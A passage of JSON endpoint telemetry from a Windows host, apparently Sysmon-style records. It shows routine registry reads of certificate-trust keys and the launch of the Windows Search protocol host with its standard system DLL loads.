"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910280000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910280000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe16_ Global\\UsGthrCtrlFltPipeMssGthrPipe16 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\" ", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "SearchIndexer.exe", - "parent_process_path": "C:\\Windows\\System32\\SearchIndexer.exe", - "pid": 3560, - "ppid": 5824, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "subtype": "create", - "timestamp": 131883570915600000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}", - "unique_ppid": "{42FC7E13-B303-5C05-0000-0010823E0600}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": 
"{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": 
"C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": 
"C:\\Windows\\System32\\gdi32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - 
"event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "SearchProtocolHost.exe", - "image_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
